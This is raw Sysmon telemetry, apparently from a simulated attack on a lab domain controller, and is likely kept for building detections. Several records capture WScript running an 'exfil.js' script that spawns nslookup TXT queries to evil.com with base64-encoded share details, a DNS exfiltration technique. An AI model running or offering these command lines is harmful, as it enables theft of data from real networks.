354300x8000000000000000211998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{00000000-0000-0000-0000-000000000000}7544<unknown process>-udpfalsefalse127.0.0.1-50956-false127.0.0.1-53domain 10341000x8000000000000000211997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.681{2E1864BB-18F4-629A-DE44-000000005F02}72641804C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-DD44-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50956- 354300x8000000000000000211995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{00000000-0000-0000-0000-000000000000}7544<unknown process>-udptruefalse127.0.0.1-50956-false127.0.0.1-53domain 354300x8000000000000000211994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{00000000-0000-0000-0000-000000000000}7544<unknown process>-udpfalsefalse127.0.0.1-50955-false127.0.0.1-53domain 354300x8000000000000000211993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50955- 354300x8000000000000000211992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.011{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50954- 354300x8000000000000000211991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.011{00000000-0000-0000-0000-000000000000}2308<unknown process>-udptruefalse127.0.0.1-50954-false127.0.0.1-53domain 354300x8000000000000000211990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.010{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50953- 354300x8000000000000000211989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.008{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50952- 10341000x8000000000000000211988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DE44-000000005F02}7264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DD44-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.664{2E1864BB-18E0-629A-6742-000000005F02}39765764C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-DD44-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.666{2E1864BB-18F4-629A-DD44-000000005F02}7996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlamogx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.648{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyor.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-18F4-629A-DB44-000000005F02}57404156C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-DC44-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DC44-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.633{2E1864BB-18F4-629A-DA44-000000005F02}77688044C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-DC44-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.639{2E1864BB-18F4-629A-DC44-000000005F02}8152C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-DA44-000000005F02}7768C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyor.tmp 2>&1 10341000x8000000000000000211971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.618{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-DB44-000000005F02}5740C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.618{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-DB44-000000005F02}5740C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.618{2E1864BB-18F4-629A-DB44-000000005F02}57404156C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-DA44-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.601{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DB44-000000005F02}5740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-DA44-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-18E0-629A-6742-000000005F02}39766244C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-DA44-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.592{2E1864BB-18F4-629A-DA44-000000005F02}7768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyor.tmp 